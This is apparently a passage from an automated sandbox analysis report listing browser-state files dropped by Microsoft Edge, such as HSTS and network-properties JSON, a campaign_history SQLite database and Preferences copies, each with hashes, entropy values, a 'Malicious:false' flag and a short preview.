                                                                                                                                                                                                                                                                                                                                                              Preview:{"sts":[{"expiry":1771399015.75695,"host":"FSrCCCgbSk94tpel8F2osMYZSqD3G8LcdQYQKv7WvPI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863015.756955},{"expiry":1771399013.747914,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863013.747918},{"expiry":1771399011.484632,"host":"R4fcRonab9q8ofkiF6a/nx3Xi2G9W1liJmg8W6yTFmo=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863011.484635},{"expiry":1771399014.599927,"host":"WY6KoNDPTe78tC/8QkuP6nj7NU/7OaY3z4ooalb+rq4=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863014.599932},{"expiry":1771399013.096226,"host":"pQ3smbAQxr6dM4VHbpg5gia+bTRSVz4p2rpusY1PJP0=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863013.096231},{"expiry":1771399014.69258,"host":"+loO+DGmT6DTr59JZFAnGSlBAwPkO5M/R9ec1Sw/9KA=","mode":"force-https","sts_include_subdomains":true,"sts_observed":173986301

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a9da256f-2885-4342-88b5-51515843ab86.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ba5bffd4-100c-465a-9e8b-c033a1eca178.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\bd3e258b-3031-4aca-9adb-641b8d79874b.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):18312
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.258150417838458
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:DK0gshBGdJivyzvgAfctth1ChQ/lPVxHzwaFs1zYqn1EEneO74lWA+LINA5XyuOz:D+KD5OMdJq8
                                                                                                                                                                                                                                                                                                                                                              MD5:A0A62C35E118603CB7D3D1E32A632543
                                                                                                                                                                                                                                                                                                                                                              SHA1:9023C12948F6940ED3D28ABBEE76A990D16C1D45
                                                                                                                                                                                                                                                                                                                                                              SHA-256:43EE1307CB58BDCBFF54A28E9F8CC459929FC1800D59CA56EA3E9496BE88AE29
                                                                                                                                                                                                                                                                                                                                                              SHA-512:84FFE2F8A978B99A45AAB5014C540882B9FAC2D324F30F5DC0F8E75DBB05B70AB4D71807ED248C9007AFA31CA7B42981CFCF99CD7E552370CFB288D616651554
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"useren_alternative_services":[{"anonymization":["GAAAABIAAABodHRwczovL3NjcmliZC5jb20AAA==",true],"useren_count":10,"useren_until":"1739863331","host":"onetag-sys.com","port":443,"protocol_str":"quic"},{"anonymization":["GAAAABIAAABodHRwczovL3NjcmliZC5jb20AAA==",true],"useren_count":2,"useren_until":"1739863331","host":"x.bidswitch.net","port":443,"protocol_str":"quic"},{"anonymization":["GAAAABIAAABodHRwczovL3NjcmliZC5jb20AAA==",true],"useren_count":1,"useren_until":"1739863332","host":"rtb.mfadsrvr.com","port":443,"protocol_str":"quic"}],"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpn

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c1a49a03-429f-4772-a60e-09c45bb756a9.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.549843224466687
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YhnDEUqb+UE79RAeUvz7wUQSRejPWIEteUjeUn+UwXmK7ozUCpRdUEQ:YqUqKUMieULEU9gj1EcUiU+UwGUCZUt
                                                                                                                                                                                                                                                                                                                                                              MD5:B4C62E58167268A2EDAE3F82709A1A22
                                                                                                                                                                                                                                                                                                                                                              SHA1:659589DE9EA648FC938E2DA92A8A8472144B5D71
                                                                                                                                                                                                                                                                                                                                                              SHA-256:EB259A61E2AD199C8A3793172EB556C10F0B3BD3AB510ECFED24A9D594388A9B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:4FDA85D3C5BCAED74F52D48773699F4144B20B858856B46FBA15A01FF2A712B8ECD8BD8ABC32F6C767453AECFFC7E8E99C49D500FF0742C89A29C83DB73C8615
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"sts":[{"expiry":1771399015.75695,"host":"FSrCCCgbSk94tpel8F2osMYZSqD3G8LcdQYQKv7WvPI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863015.756955},{"expiry":1771399023.470199,"host":"Hi4bEdMq563Qsqn4sVyUls/uVk7U80IxMa3wyWVUqWU=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863023.470202},{"expiry":1771399023.592313,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863023.592317},{"expiry":1771399011.484632,"host":"R4fcRonab9q8ofkiF6a/nx3Xi2G9W1liJmg8W6yTFmo=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1739863011.484635},{"expiry":1771399014.599927,"host":"WY6KoNDPTe78tC/8QkuP6nj7NU/7OaY3z4ooalb+rq4=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863014.599932},{"expiry":1771399013.096226,"host":"pQ3smbAQxr6dM4VHbpg5gia+bTRSVz4p2rpusY1PJP0=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1739863

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d7af7d76-5e24-43fd-8da8-7694809d3e3d.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\da06ccd9-a26c-431b-9c4c-f8f8189bb37f.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ef0524a6-41ad-417c-bed5-7bc467fff99a.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f4170ab3-9d23-422d-994d-f965ad944569.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1453
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.300008301469919
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7nby:YcCpWsquCvsBfcKspgCgakhYhbg
                                                                                                                                                                                                                                                                                                                                                              MD5:6D62BD7FBF058BA973FD160EC7EECAF8
                                                                                                                                                                                                                                                                                                                                                              SHA1:7C6A2F7459CE570BC83DAF81A9C0BAA8EC60FA2D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:8D24CACEFBD3B56B7794CE5646E20848895A11BB6A8CC3C04E3880B0FEBE88B2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B510814BAC84C303D6CDD4238AF2A1026A0FF7FD3EA0BF7D05F00348D8A8AE75AA02F55D5C185309A05295C0D83E6C10B788CFB68BD8DA623CBFA2885273468E
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8307038620100359
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:TLSOUOq0afDdWec9sJlAz7Nm2z8ZI7J5fc:T+OUzDbg3eAzA2ztc
                                                                                                                                                                                                                                                                                                                                                              MD5:B18967139991D9CA13DF7E493540A358
                                                                                                                                                                                                                                                                                                                                                              SHA1:97411C14A8503C11248BE7404C9A79BA5146D40C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCC36F21951B4CB357C57DA0CCA1FFF3B4C7027230C10FD8BCB72C0AFF66141F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:473AE1B215B181785EA65F87E34155D5976C7AD1FA487B025E1C8711BFD127E99066990105CDA8D6F4804459118361217455AB1644803D22E6ECB164EEEFD630
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF256d0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF28032.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2af41.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2dba0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

